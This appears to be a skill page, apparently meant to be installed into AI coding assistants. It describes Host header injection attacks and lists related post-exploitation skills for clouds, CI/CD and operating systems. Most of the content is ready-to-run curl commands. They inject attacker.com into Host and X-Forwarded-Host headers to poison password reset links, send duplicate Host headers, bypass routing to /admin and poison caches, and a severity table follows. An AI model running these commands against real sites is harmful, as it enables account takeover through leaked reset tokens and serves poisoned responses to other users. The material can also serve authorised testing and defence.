Menu
Host header injection — password reset poisoning, cache poisoning, routing bypass, SSRF via Host
Installer avec Codex ou Claude Copiez ce prompt, collez-le dans Codex, Claude ou un autre assistant, puis laissez-le vérifier la page du skill et l'installer pour vous.
Basé sur la classification professionnelle SOC
eBPF-based post-exploitation for kernel-level credential harvesting, process hiding, and traffic interception on Linux
AWS post-exploitation for IAM privilege escalation, data exfiltration, persistence, and operational security via boto3
Azure/Entra ID post-exploitation for tenant compromise, Key Vault extraction, managed identity abuse, and token manipulation
CI/CD pipeline attacks for secret extraction, pipeline injection, and supply chain compromise via GitHub/Jenkins/GitLab
Kubernetes post-exploitation for container escape, secret extraction, RBAC abuse, and cluster persistence
macOS post-exploitation for credential harvesting, DTrace monitoring, TCC bypass, and stealth operations via native tools
| name | attack-host-header |
| description | Host header injection — password reset poisoning, cache poisoning, routing bypass, SSRF via Host |
| category | web-application |
| version | 1.0 |
| author | cyberstrike-official |
| tags | ["host-header","web","injection","attack"] |
| tech_stack | ["web"] |
| cwe_ids | ["CWE-644"] |
| chains_with | ["attack-cache-poison","attack-open-redirect"] |
| prerequisites | [] |
| severity_boost | {"attack-cache-poison":"Host header + cache poisoning = stored attack affecting all users"} |
Exploit web server reliance on the Host header to poison password reset links, web caches, or route requests to internal services.
# Trigger password reset with injected Host
curl -X POST https://TARGET/forgot-password \
-H "Host: attacker.com" \
-d "email=victim@example.com"
# X-Forwarded-Host variant
curl -X POST https://TARGET/forgot-password \
-H "X-Forwarded-Host: attacker.com" \
-d "email=victim@example.com"
If the reset email link contains attacker.com, the token is leaked when victim clicks.
# Two Host headers
curl https://TARGET/ \
-H "Host: TARGET" \
-H "Host: attacker.com"
# Host with port injection
curl https://TARGET/ \
-H "Host: TARGET:@attacker.com"
curl https://TARGET/ -H "X-Forwarded-Host: attacker.com"
curl https://TARGET/ -H "X-Host: attacker.com"
curl https://TARGET/ -H "X-Forwarded-Server: attacker.com"
curl https://TARGET/ -H "X-Original-URL: /admin"
curl https://TARGET/ -H "X-Rewrite-URL: /admin"
# Absolute URL overrides Host header
curl "https://TARGET/api" \
-H "Host: internal-admin.TARGET"
# If response is cached with injected host
curl https://TARGET/ -H "X-Forwarded-Host: attacker.com" -H "X-Cache: miss"
# Subsequent requests from any user will get poisoned response
| Finding | Severity |
|---|---|
| Password reset link contains injected host | Critical (P1) |
| Cache poisoned with injected host/links | High (P2) |
| Internal routing bypass (access /admin) | High (P2) |
| Host header reflected in page without sanitization | Medium (P3) |